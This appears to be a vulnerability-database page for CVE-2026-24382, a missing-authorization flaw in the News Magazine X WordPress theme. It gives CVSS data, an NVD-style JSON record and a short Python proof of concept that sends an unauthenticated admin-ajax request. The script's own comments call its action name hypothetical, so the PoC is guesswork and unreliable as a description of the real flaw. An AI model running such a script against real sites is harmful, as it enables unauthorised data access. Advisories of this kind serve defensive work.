Security Vulnerability Report
中文
CVE-2026-24382 CVSS 7.5 HIGH

CVE-2026-24382

Published: 2026-03-25 17:16:38
Last Modified: 2026-04-28 15:16:09

Description

Missing Authorization vulnerability in wproyal News Magazine X news-magazine-x allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects News Magazine X: from n/a through <= 1.2.50.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

News Magazine X <= 1.2.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_missing_auth(target_url): """ PoC for CVE-2026-24382 Missing Authorization """ # The endpoint usually targets admin-ajax.php in WordPress ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload based on the vulnerable action (hypothetical action name) data = { "action": "nmx_export_data", # Example action susceptible to missing auth "type": "all" } try: response = requests.post(ajax_url, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request sent to {ajax_url}") print(f"[+] Response (Status: {response.status_code}):") print(response.text[:500]) # Print first 500 chars to verify data leakage else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example.com" exploit_missing_auth(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24382", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:38.237", "lastModified": "2026-04-28T15:16:08.590", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wproyal News Magazine X news-magazine-x allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects News Magazine X: from n/a through <= 1.2.50."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en wproyal News Magazine X news-magazine-x permite explotar niveles de seguridad de control de acceso incorrectamente configurados. Este problema afecta a News Magazine X: desde n/a hasta &lt;= 1.2.50."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/news-magazine-x/vulnerability/wordpress-news-magazine-x-theme-1-2-50-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}